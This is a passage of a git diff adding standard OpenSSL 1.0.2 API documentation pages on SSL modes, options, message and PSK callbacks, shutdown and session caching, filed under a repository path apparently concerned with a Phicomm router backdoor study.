+and the next call to SSL_write() must only send the n-r bytes left,
+imitating the behaviour of write().
+
+=item SSL_MODE_ACCEPT_MOVING_WRITE_BUFFER
+
+Make it possible to retry SSL_write() with changed buffer location
+(the buffer contents must stay the same). This is not the default to avoid
+the misconception that non-blocking SSL_write() behaves like
+non-blocking write().
+
+=item SSL_MODE_AUTO_RETRY
+
+Never bother the application with retries if the transport is blocking.
+If a renegotiation take place during normal operation, a
+L<SSL_read(3)|SSL_read(3)> or L<SSL_write(3)|SSL_write(3)> would return
+with -1 and indicate the need to retry with SSL_ERROR_WANT_READ.
+In a non-blocking environment applications must be prepared to handle
+incomplete read/write operations.
+In a blocking environment, applications are not always prepared to
+deal with read/write operations returning without success report. The
+flag SSL_MODE_AUTO_RETRY will cause read/write operations to only
+return after the handshake and successful completion.
+
+=item SSL_MODE_RELEASE_BUFFERS
+
+When we no longer need a read buffer or a write buffer for a given SSL,
+then release the memory we were using to hold it.  Released memory is
+either appended to a list of unused RAM chunks on the SSL_CTX, or simply
+freed if the list of unused chunks would become longer than 
+SSL_CTX->freelist_max_len, which defaults to 32.  Using this flag can
+save around 34k per idle SSL connection.
+This flag has no effect on SSL v2 connections, or on DTLS connections.
+
+=item SSL_MODE_SEND_FALLBACK_SCSV
+
+Send TLS_FALLBACK_SCSV in the ClientHello.
+To be set only by applications that reconnect with a downgraded protocol
+version; see draft-ietf-tls-downgrade-scsv-00 for details.
+
+DO NOT ENABLE THIS if your application attempts a normal handshake.
+Only use this in explicit fallback retries, following the guidance
+in draft-ietf-tls-downgrade-scsv-00.
+
+=back
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_mode() and SSL_set_mode() return the new mode bitmask
+after adding B<mode>.
+
+SSL_CTX_get_mode() and SSL_get_mode() return the current bitmask.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_read(3)|SSL_read(3)>, L<SSL_write(3)|SSL_write(3)>
+
+=head1 HISTORY
+
+SSL_MODE_AUTO_RETRY as been added in OpenSSL 0.9.6.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_msg_callback.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_msg_callback.pod
new file mode 100644
index 0000000..8b82d94
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_msg_callback.pod
@@ -0,0 +1,99 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_msg_callback, SSL_CTX_set_msg_callback_arg, SSL_set_msg_callback, SSL_get_msg_callback_arg - install callback for observing protocol messages
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_set_msg_callback(SSL_CTX *ctx, void (*cb)(int write_p, int version, int content_type, const void *buf, size_t len, SSL *ssl, void *arg));
+ void SSL_CTX_set_msg_callback_arg(SSL_CTX *ctx, void *arg);
+
+ void SSL_set_msg_callback(SSL *ssl, void (*cb)(int write_p, int version, int content_type, const void *buf, size_t len, SSL *ssl, void *arg));
+ void SSL_set_msg_callback_arg(SSL *ssl, void *arg);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_msg_callback() or SSL_set_msg_callback() can be used to
+define a message callback function I<cb> for observing all SSL/TLS
+protocol messages (such as handshake messages) that are received or
+sent.  SSL_CTX_set_msg_callback_arg() and SSL_set_msg_callback_arg()
+can be used to set argument I<arg> to the callback function, which is
+available for arbitrary application use.
+
+SSL_CTX_set_msg_callback() and SSL_CTX_set_msg_callback_arg() specify
+default settings that will be copied to new B<SSL> objects by
+L<SSL_new(3)|SSL_new(3)>. SSL_set_msg_callback() and
+SSL_set_msg_callback_arg() modify the actual settings of an B<SSL>
+object. Using a B<0> pointer for I<cb> disables the message callback.
+
+When I<cb> is called by the SSL/TLS library for a protocol message,
+the function arguments have the following meaning:
+
+=over 4
+
+=item I<write_p>
+
+This flag is B<0> when a protocol message has been received and B<1>
+when a protocol message has been sent.
+
+=item I<version>
+
+The protocol version according to which the protocol message is
+interpreted by the library. Currently, this is one of
+B<SSL2_VERSION>, B<SSL3_VERSION> and B<TLS1_VERSION> (for SSL 2.0, SSL
+3.0 and TLS 1.0, respectively).
+
+=item I<content_type>
+
+In the case of SSL 2.0, this is always B<0>.  In the case of SSL 3.0
+or TLS 1.0, this is one of the B<ContentType> values defined in the
+protocol specification (B<change_cipher_spec(20)>, B<alert(21)>,
+B<handshake(22)>; but never B<application_data(23)> because the
+callback will only be called for protocol messages).
+
+=item I<buf>, I<len>
+
+I<buf> points to a buffer containing the protocol message, which
+consists of I<len> bytes. The buffer is no longer valid after the
+callback function has returned.
+
+=item I<ssl>
+
+The B<SSL> object that received or sent the message.
+
+=item I<arg>
+
+The user-defined argument optionally defined by
+SSL_CTX_set_msg_callback_arg() or SSL_set_msg_callback_arg().
+
+=back
+
+=head1 NOTES
+
+Protocol messages are passed to the callback function after decryption
+and fragment collection where applicable. (Thus record boundaries are
+not visible.)
+
+If processing a received protocol message results in an error,
+the callback function may not be called.  For example, the callback
+function will never see messages that are considered too large to be
+processed.
+
+Due to automatic protocol version negotiation, I<version> is not
+necessarily the protocol version used by the sender of the message: If
+a TLS 1.0 ClientHello message is received by an SSL 3.0-only server,
+I<version> will be B<SSL3_VERSION>.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_new(3)|SSL_new(3)>
+
+=head1 HISTORY
+
+SSL_CTX_set_msg_callback(), SSL_CTX_set_msg_callback_arg(),
+SSL_set_msg_callback() and SSL_get_msg_callback_arg() were added in OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_options.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_options.pod
new file mode 100644
index 0000000..e80a72c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_options.pod
@@ -0,0 +1,345 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_options, SSL_set_options, SSL_CTX_clear_options, SSL_clear_options, SSL_CTX_get_options, SSL_get_options, SSL_get_secure_renegotiation_support - manipulate SSL options
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ long SSL_CTX_set_options(SSL_CTX *ctx, long options);
+ long SSL_set_options(SSL *ssl, long options);
+
+ long SSL_CTX_clear_options(SSL_CTX *ctx, long options);
+ long SSL_clear_options(SSL *ssl, long options);
+
+ long SSL_CTX_get_options(SSL_CTX *ctx);
+ long SSL_get_options(SSL *ssl);
+
+ long SSL_get_secure_renegotiation_support(SSL *ssl);
+
+=head1 DESCRIPTION
+
+Note: all these functions are implemented using macros.
+
+SSL_CTX_set_options() adds the options set via bitmask in B<options> to B<ctx>.
+Options already set before are not cleared!
+
+SSL_set_options() adds the options set via bitmask in B<options> to B<ssl>.
+Options already set before are not cleared!
+
+SSL_CTX_clear_options() clears the options set via bitmask in B<options>
+to B<ctx>.
+
+SSL_clear_options() clears the options set via bitmask in B<options> to B<ssl>.
+
+SSL_CTX_get_options() returns the options set for B<ctx>.
+
+SSL_get_options() returns the options set for B<ssl>.
+
+SSL_get_secure_renegotiation_support() indicates whether the peer supports
+secure renegotiation.
+
+=head1 NOTES
+
+The behaviour of the SSL library can be changed by setting several options.
+The options are coded as bitmasks and can be combined by a logical B<or>
+operation (|).
+
+SSL_CTX_set_options() and SSL_set_options() affect the (external)
+protocol behaviour of the SSL library. The (internal) behaviour of
+the API can be changed by using the similar
+L<SSL_CTX_set_mode(3)|SSL_CTX_set_mode(3)> and SSL_set_mode() functions.
+
+During a handshake, the option settings of the SSL object are used. When
+a new SSL object is created from a context using SSL_new(), the current
+option setting is copied. Changes to B<ctx> do not affect already created
+SSL objects. SSL_clear() does not affect the settings.
+
+The following B<bug workaround> options are available:
+
+=over 4
+
+=item SSL_OP_MICROSOFT_SESS_ID_BUG
+
+www.microsoft.com - when talking SSLv2, if session-id reuse is
+performed, the session-id passed back in the server-finished message
+is different from the one decided upon.
+
+=item SSL_OP_NETSCAPE_CHALLENGE_BUG
+
+Netscape-Commerce/1.12, when talking SSLv2, accepts a 32 byte
+challenge but then appears to only use 16 bytes when generating the
+encryption keys.  Using 16 bytes is ok but it should be ok to use 32.
+According to the SSLv3 spec, one should use 32 bytes for the challenge
+when operating in SSLv2/v3 compatibility mode, but as mentioned above,
+this breaks this server so 16 bytes is the way to go.
+
+=item SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG
+
+As of OpenSSL 0.9.8q and 1.0.0c, this option has no effect.
+
+=item SSL_OP_SSLREF2_REUSE_CERT_TYPE_BUG
+
+...
+
+=item SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER
+
+...
+
+=item SSL_OP_SAFARI_ECDHE_ECDSA_BUG
+
+Don't prefer ECDHE-ECDSA ciphers when the client appears to be Safari on OS X.
+OS X 10.8..10.8.3 has broken support for ECDHE-ECDSA ciphers.
+
+=item SSL_OP_SSLEAY_080_CLIENT_DH_BUG
+
+...
+
+=item SSL_OP_TLS_D5_BUG
+
+...
+
+=item SSL_OP_TLS_BLOCK_PADDING_BUG
+
+...
+
+=item SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS
+
+Disables a countermeasure against a SSL 3.0/TLS 1.0 protocol
+vulnerability affecting CBC ciphers, which cannot be handled by some
+broken SSL implementations.  This option has no effect for connections
+using other ciphers.
+
+=item SSL_OP_TLSEXT_PADDING
+
+Adds a padding extension to ensure the ClientHello size is never between
+256 and 511 bytes in length. This is needed as a workaround for some
+implementations.
+
+=item SSL_OP_ALL
+
+All of the above bug workarounds.
+
+=back
+
+It is usually safe to use B<SSL_OP_ALL> to enable the bug workaround
+options if compatibility with somewhat broken implementations is
+desired.
+
+The following B<modifying> options are available:
+
+=over 4
+
+=item SSL_OP_TLS_ROLLBACK_BUG
+
+Disable version rollback attack detection.
+
+During the client key exchange, the client must send the same information
+about acceptable SSL/TLS protocol levels as during the first hello. Some
+clients violate this rule by adapting to the server's answer. (Example:
+the client sends a SSLv2 hello and accepts up to SSLv3.1=TLSv1, the server
+only understands up to SSLv3. In this case the client must still use the
+same SSLv3.1=TLSv1 announcement. Some clients step down to SSLv3 with respect
+to the server's answer and violate the version rollback protection.)
+
+=item SSL_OP_SINGLE_DH_USE
+
+Always create a new key when using temporary/ephemeral DH parameters
+(see L<SSL_CTX_set_tmp_dh_callback(3)|SSL_CTX_set_tmp_dh_callback(3)>).
+This option must be used to prevent small subgroup attacks, when
+the DH parameters were not generated using "strong" primes
+(e.g. when using DSA-parameters, see L<dhparam(1)|dhparam(1)>).
+If "strong" primes were used, it is not strictly necessary to generate
+a new DH key during each handshake but it is also recommended.
+B<SSL_OP_SINGLE_DH_USE> should therefore be enabled whenever
+temporary/ephemeral DH parameters are used.
+
+=item SSL_OP_EPHEMERAL_RSA
+
+This option is no longer implemented and is treated as no op.
+
+=item SSL_OP_CIPHER_SERVER_PREFERENCE
+
+When choosing a cipher, use the server's preferences instead of the client
+preferences. When not set, the SSL server will always follow the clients
+preferences. When set, the SSLv3/TLSv1 server will choose following its
+own preferences. Because of the different protocol, for SSLv2 the server
+will send its list of preferences to the client and the client chooses.
+
+=item SSL_OP_PKCS1_CHECK_1
+
+...
+
+=item SSL_OP_PKCS1_CHECK_2
+
+...
+
+=item SSL_OP_NETSCAPE_CA_DN_BUG
+
+If we accept a netscape connection, demand a client cert, have a
+non-self-signed CA which does not have its CA in netscape, and the
+browser has a cert, it will crash/hang.  Works for 3.x and 4.xbeta 
+
+=item SSL_OP_NETSCAPE_DEMO_CIPHER_CHANGE_BUG
+
+...
+
+=item SSL_OP_NO_SSLv2
+
+Do not use the SSLv2 protocol.
+
+=item SSL_OP_NO_SSLv3
+
+Do not use the SSLv3 protocol.
+
+=item SSL_OP_NO_TLSv1
+
+Do not use the TLSv1 protocol.
+
+=item SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION
+
+When performing renegotiation as a server, always start a new session
+(i.e., session resumption requests are only accepted in the initial
+handshake). This option is not needed for clients.
+
+=item SSL_OP_NO_TICKET
+
+Normally clients and servers will, where possible, transparently make use
+of RFC4507bis tickets for stateless session resumption.
+
+If this option is set this functionality is disabled and tickets will
+not be used by clients or servers.
+
+=item SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION
+
+Allow legacy insecure renegotiation between OpenSSL and unpatched clients or
+servers. See the B<SECURE RENEGOTIATION> section for more details.
+
+=item SSL_OP_LEGACY_SERVER_CONNECT
+
+Allow legacy insecure renegotiation between OpenSSL and unpatched servers
+B<only>: this option is currently set by default. See the
+B<SECURE RENEGOTIATION> section for more details.
+
+=back
+
+=head1 SECURE RENEGOTIATION
+
+OpenSSL 0.9.8m and later always attempts to use secure renegotiation as
+described in RFC5746. This counters the prefix attack described in
+CVE-2009-3555 and elsewhere.
+
+The deprecated and highly broken SSLv2 protocol does not support
+renegotiation at all: its use is B<strongly> discouraged.
+
+This attack has far reaching consequences which application writers should be
+aware of. In the description below an implementation supporting secure
+renegotiation is referred to as I<patched>. A server not supporting secure
+renegotiation is referred to as I<unpatched>.
+
+The following sections describe the operations permitted by OpenSSL's secure
+renegotiation implementation.
+
+=head2 Patched client and server
+
+Connections and renegotiation are always permitted by OpenSSL implementations.
+
+=head2 Unpatched client and patched OpenSSL server
+
+The initial connection succeeds but client renegotiation is denied by the
+server with a B<no_renegotiation> warning alert if TLS v1.0 is used or a fatal
+B<handshake_failure> alert in SSL v3.0.
+
+If the patched OpenSSL server attempts to renegotiate a fatal
+B<handshake_failure> alert is sent. This is because the server code may be
+unaware of the unpatched nature of the client.
+
+If the option B<SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION> is set then
+renegotiation B<always> succeeds.
+
+B<NB:> a bug in OpenSSL clients earlier than 0.9.8m (all of which are
+unpatched) will result in the connection hanging if it receives a
+B<no_renegotiation> alert. OpenSSL versions 0.9.8m and later will regard
+a B<no_renegotiation> alert as fatal and respond with a fatal
+B<handshake_failure> alert. This is because the OpenSSL API currently has
+no provision to indicate to an application that a renegotiation attempt
+was refused.
+
+=head2 Patched OpenSSL client and unpatched server.
+
+If the option B<SSL_OP_LEGACY_SERVER_CONNECT> or
+B<SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION> is set then initial connections
+and renegotiation between patched OpenSSL clients and unpatched servers
+succeeds. If neither option is set then initial connections to unpatched
+servers will fail.
+
+The option B<SSL_OP_LEGACY_SERVER_CONNECT> is currently set by default even
+though it has security implications: otherwise it would be impossible to
+connect to unpatched servers (i.e. all of them initially) and this is clearly
+not acceptable. Renegotiation is permitted because this does not add any
+additional security issues: during an attack clients do not see any
+renegotiations anyway.
+
+As more servers become patched the option B<SSL_OP_LEGACY_SERVER_CONNECT> will
+B<not> be set by default in a future version of OpenSSL.
+
+OpenSSL client applications wishing to ensure they can connect to unpatched
+servers should always B<set> B<SSL_OP_LEGACY_SERVER_CONNECT>
+
+OpenSSL client applications that want to ensure they can B<not> connect to
+unpatched servers (and thus avoid any security issues) should always B<clear>
+B<SSL_OP_LEGACY_SERVER_CONNECT> using SSL_CTX_clear_options() or
+SSL_clear_options().
+
+The difference between the B<SSL_OP_LEGACY_SERVER_CONNECT> and
+B<SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION> options is that
+B<SSL_OP_LEGACY_SERVER_CONNECT> enables initial connections and secure
+renegotiation between OpenSSL clients and unpatched servers B<only>, while
+B<SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION> allows initial connections
+and renegotiation between OpenSSL and unpatched clients or servers.
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_options() and SSL_set_options() return the new options bitmask
+after adding B<options>.
+
+SSL_CTX_clear_options() and SSL_clear_options() return the new options bitmask
+after clearing B<options>.
+
+SSL_CTX_get_options() and SSL_get_options() return the current bitmask.
+
+SSL_get_secure_renegotiation_support() returns 1 is the peer supports
+secure renegotiation and 0 if it does not.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_new(3)|SSL_new(3)>, L<SSL_clear(3)|SSL_clear(3)>,
+L<SSL_CTX_set_tmp_dh_callback(3)|SSL_CTX_set_tmp_dh_callback(3)>,
+L<SSL_CTX_set_tmp_rsa_callback(3)|SSL_CTX_set_tmp_rsa_callback(3)>,
+L<dhparam(1)|dhparam(1)>
+
+=head1 HISTORY
+
+B<SSL_OP_CIPHER_SERVER_PREFERENCE> and
+B<SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION> have been added in
+OpenSSL 0.9.7.
+
+B<SSL_OP_TLS_ROLLBACK_BUG> has been added in OpenSSL 0.9.6 and was automatically
+enabled with B<SSL_OP_ALL>. As of 0.9.7, it is no longer included in B<SSL_OP_ALL>
+and must be explicitly set.
+
+B<SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS> has been added in OpenSSL 0.9.6e.
+Versions up to OpenSSL 0.9.6c do not include the countermeasure that
+can be disabled with this option (in OpenSSL 0.9.6d, it was always
+enabled).
+
+SSL_CTX_clear_options() and SSL_clear_options() were first added in OpenSSL
+0.9.8m.
+
+B<SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION>, B<SSL_OP_LEGACY_SERVER_CONNECT>
+and the function SSL_get_secure_renegotiation_support() were first added in
+OpenSSL 0.9.8m.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_psk_client_callback.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_psk_client_callback.pod
new file mode 100644
index 0000000..573f89a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_psk_client_callback.pod
@@ -0,0 +1,81 @@
+=pod
+
+=begin comment
+
+Copyright 2005 Nokia. All rights reserved.
+
+The portions of the attached software ("Contribution") is developed by
+Nokia Corporation and is licensed pursuant to the OpenSSL open source
+license.
+
+The Contribution, originally written by Mika Kousa and Pasi Eronen of
+Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+support (see RFC 4279) to OpenSSL.
+
+No patent licenses or other rights except those expressly stated in
+the OpenSSL open source license shall be deemed granted or received
+expressly, by implication, estoppel, or otherwise.
+
+No assurances are provided by Nokia that the Contribution does not
+infringe the patent or other intellectual property rights of any third
+party or that the license provides you with all the necessary rights
+to make use of the Contribution.
+
+THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+OTHERWISE.
+
+=end comment
+
+=head1 NAME
+
+SSL_CTX_set_psk_client_callback, SSL_set_psk_client_callback - set PSK client callback
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_set_psk_client_callback(SSL_CTX *ctx,
+	unsigned int (*callback)(SSL *ssl, const char *hint,
+	char *identity, unsigned int max_identity_len,
+	unsigned char *psk, unsigned int max_psk_len));
+ void SSL_set_psk_client_callback(SSL *ssl,
+	unsigned int (*callback)(SSL *ssl, const char *hint,
+	char *identity, unsigned int max_identity_len,
+ 	unsigned char *psk, unsigned int max_psk_len));
+
+
+=head1 DESCRIPTION
+
+A client application must provide a callback function which is called
+when the client is sending the ClientKeyExchange message to the server.
+
+The purpose of the callback function is to select the PSK identity and
+the pre-shared key to use during the connection setup phase.
+
+The callback is set using functions SSL_CTX_set_psk_client_callback()
+or SSL_set_psk_client_callback(). The callback function is given the
+connection in parameter B<ssl>, a B<NULL>-terminated PSK identity hint
+sent by the server in parameter B<hint>, a buffer B<identity> of
+length B<max_identity_len> bytes where the the resulting
+B<NULL>-terminated identity is to be stored, and a buffer B<psk> of
+length B<max_psk_len> bytes where the resulting pre-shared key is to
+be stored.
+
+=head1 NOTES
+
+Note that parameter B<hint> given to the callback may be B<NULL>.
+
+=head1 RETURN VALUES
+
+Return values from the client callback are interpreted as follows:
+
+On success (callback found a PSK identity and a pre-shared key to use)
+the length (> 0) of B<psk> in bytes is returned.
+
+Otherwise or on errors callback should return 0. In this case
+the connection setup fails.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_quiet_shutdown.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_quiet_shutdown.pod
new file mode 100644
index 0000000..393f8ff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_quiet_shutdown.pod
@@ -0,0 +1,63 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_quiet_shutdown, SSL_CTX_get_quiet_shutdown, SSL_set_quiet_shutdown, SSL_get_quiet_shutdown - manipulate shutdown behaviour
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_set_quiet_shutdown(SSL_CTX *ctx, int mode);
+ int SSL_CTX_get_quiet_shutdown(const SSL_CTX *ctx);
+
+ void SSL_set_quiet_shutdown(SSL *ssl, int mode);
+ int SSL_get_quiet_shutdown(const SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_quiet_shutdown() sets the "quiet shutdown" flag for B<ctx> to be
+B<mode>. SSL objects created from B<ctx> inherit the B<mode> valid at the time
+L<SSL_new(3)|SSL_new(3)> is called. B<mode> may be 0 or 1.
+
+SSL_CTX_get_quiet_shutdown() returns the "quiet shutdown" setting of B<ctx>.
+
+SSL_set_quiet_shutdown() sets the "quiet shutdown" flag for B<ssl> to be
+B<mode>. The setting stays valid until B<ssl> is removed with
+L<SSL_free(3)|SSL_free(3)> or SSL_set_quiet_shutdown() is called again.
+It is not changed when L<SSL_clear(3)|SSL_clear(3)> is called.
+B<mode> may be 0 or 1.
+
+SSL_get_quiet_shutdown() returns the "quiet shutdown" setting of B<ssl>.
+
+=head1 NOTES
+
+Normally when a SSL connection is finished, the parties must send out
+"close notify" alert messages using L<SSL_shutdown(3)|SSL_shutdown(3)>
+for a clean shutdown.
+
+When setting the "quiet shutdown" flag to 1, L<SSL_shutdown(3)|SSL_shutdown(3)>
+will set the internal flags to SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN.
+(L<SSL_shutdown(3)|SSL_shutdown(3)> then behaves like
+L<SSL_set_shutdown(3)|SSL_set_shutdown(3)> called with
+SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN.)
+The session is thus considered to be shutdown, but no "close notify" alert
+is sent to the peer. This behaviour violates the TLS standard.
+
+The default is normal shutdown behaviour as described by the TLS standard.
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_quiet_shutdown() and SSL_set_quiet_shutdown() do not return
+diagnostic information.
+
+SSL_CTX_get_quiet_shutdown() and SSL_get_quiet_shutdown return the current
+setting.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_shutdown(3)|SSL_shutdown(3)>,
+L<SSL_set_shutdown(3)|SSL_set_shutdown(3)>, L<SSL_new(3)|SSL_new(3)>,
+L<SSL_clear(3)|SSL_clear(3)>, L<SSL_free(3)|SSL_free(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_session_cache_mode.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_session_cache_mode.pod
new file mode 100644
index 0000000..c5d2f43
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_session_cache_mode.pod
@@ -0,0 +1,137 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_session_cache_mode, SSL_CTX_get_session_cache_mode - enable/disable session caching
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ long SSL_CTX_set_session_cache_mode(SSL_CTX ctx, long mode);
+ long SSL_CTX_get_session_cache_mode(SSL_CTX ctx);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_session_cache_mode() enables/disables session caching
+by setting the operational mode for B<ctx> to <mode>.
+
+SSL_CTX_get_session_cache_mode() returns the currently used cache mode.
+
+=head1 NOTES
+
+The OpenSSL library can store/retrieve SSL/TLS sessions for later reuse.
+The sessions can be held in memory for each B<ctx>, if more than one
+SSL_CTX object is being maintained, the sessions are unique for each SSL_CTX
+object.
+
+In order to reuse a session, a client must send the session's id to the
+server. It can only send exactly one id.  The server then either 
+agrees to reuse the session or it starts a full handshake (to create a new
+session).
+
+A server will lookup up the session in its internal session storage. If the
+session is not found in internal storage or lookups for the internal storage
+have been deactivated (SSL_SESS_CACHE_NO_INTERNAL_LOOKUP), the server will try
+the external storage if available.
+
+Since a client may try to reuse a session intended for use in a different
+context, the session id context must be set by the server (see
+L<SSL_CTX_set_session_id_context(3)|SSL_CTX_set_session_id_context(3)>).
+
+The following session cache modes and modifiers are available:
+
+=over 4
+
+=item SSL_SESS_CACHE_OFF
+
+No session caching for client or server takes place.
+
+=item SSL_SESS_CACHE_CLIENT
+
+Client sessions are added to the session cache. As there is no reliable way
+for the OpenSSL library to know whether a session should be reused or which
+session to choose (due to the abstract BIO layer the SSL engine does not
+have details about the connection), the application must select the session
+to be reused by using the L<SSL_set_session(3)|SSL_set_session(3)>
+function. This option is not activated by default.
+
+=item SSL_SESS_CACHE_SERVER
+
+Server sessions are added to the session cache. When a client proposes a
+session to be reused, the server looks for the corresponding session in (first)
+the internal session cache (unless SSL_SESS_CACHE_NO_INTERNAL_LOOKUP is set),
+then (second) in the external cache if available. If the session is found, the
+server will try to reuse the session.  This is the default.
+
+=item SSL_SESS_CACHE_BOTH
+
+Enable both SSL_SESS_CACHE_CLIENT and SSL_SESS_CACHE_SERVER at the same time.
+
+=item SSL_SESS_CACHE_NO_AUTO_CLEAR
+
+Normally the session cache is checked for expired sessions every
+255 connections using the
+L<SSL_CTX_flush_sessions(3)|SSL_CTX_flush_sessions(3)> function. Since
+this may lead to a delay which cannot be controlled, the automatic
+flushing may be disabled and
+L<SSL_CTX_flush_sessions(3)|SSL_CTX_flush_sessions(3)> can be called
+explicitly by the application.
+
+=item SSL_SESS_CACHE_NO_INTERNAL_LOOKUP
+
+By setting this flag, session-resume operations in an SSL/TLS server will not
+automatically look up sessions in the internal cache, even if sessions are
+automatically stored there. If external session caching callbacks are in use,
+this flag guarantees that all lookups are directed to the external cache.
+As automatic lookup only applies for SSL/TLS servers, the flag has no effect on
+clients.
+
+=item SSL_SESS_CACHE_NO_INTERNAL_STORE
+
+Depending on the presence of SSL_SESS_CACHE_CLIENT and/or SSL_SESS_CACHE_SERVER,
+sessions negotiated in an SSL/TLS handshake may be cached for possible reuse.
+Normally a new session is added to the internal cache as well as any external
+session caching (callback) that is configured for the SSL_CTX. This flag will
+prevent sessions being stored in the internal cache (though the application can
+add them manually using L<SSL_CTX_add_session(3)|SSL_CTX_add_session(3)>). Note:
+in any SSL/TLS servers where external caching is configured, any successful
+session lookups in the external cache (ie. for session-resume requests) would
+normally be copied into the local cache before processing continues - this flag
+prevents these additions to the internal cache as well.
+
+=item SSL_SESS_CACHE_NO_INTERNAL
+
+Enable both SSL_SESS_CACHE_NO_INTERNAL_LOOKUP and
+SSL_SESS_CACHE_NO_INTERNAL_STORE at the same time.
+
+
+=back
+
+The default mode is SSL_SESS_CACHE_SERVER.
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_session_cache_mode() returns the previously set cache mode.
+
+SSL_CTX_get_session_cache_mode() returns the currently set cache mode.
+
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_set_session(3)|SSL_set_session(3)>,
+L<SSL_session_reused(3)|SSL_session_reused(3)>,
+L<SSL_CTX_add_session(3)|SSL_CTX_add_session(3)>,
+L<SSL_CTX_sess_number(3)|SSL_CTX_sess_number(3)>,
+L<SSL_CTX_sess_set_cache_size(3)|SSL_CTX_sess_set_cache_size(3)>,
+L<SSL_CTX_sess_set_get_cb(3)|SSL_CTX_sess_set_get_cb(3)>,
+L<SSL_CTX_set_session_id_context(3)|SSL_CTX_set_session_id_context(3)>,
+L<SSL_CTX_set_timeout(3)|SSL_CTX_set_timeout(3)>,
+L<SSL_CTX_flush_sessions(3)|SSL_CTX_flush_sessions(3)>
+
+=head1 HISTORY
+
+SSL_SESS_CACHE_NO_INTERNAL_STORE and SSL_SESS_CACHE_NO_INTERNAL
+were introduced in OpenSSL 0.9.6h.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_session_id_context.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_session_id_context.pod
new file mode 100644
index 0000000..7c9e515
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_session_id_context.pod
@@ -0,0 +1,83 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_session_id_context, SSL_set_session_id_context - set context within which session can be reused (server side only)
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
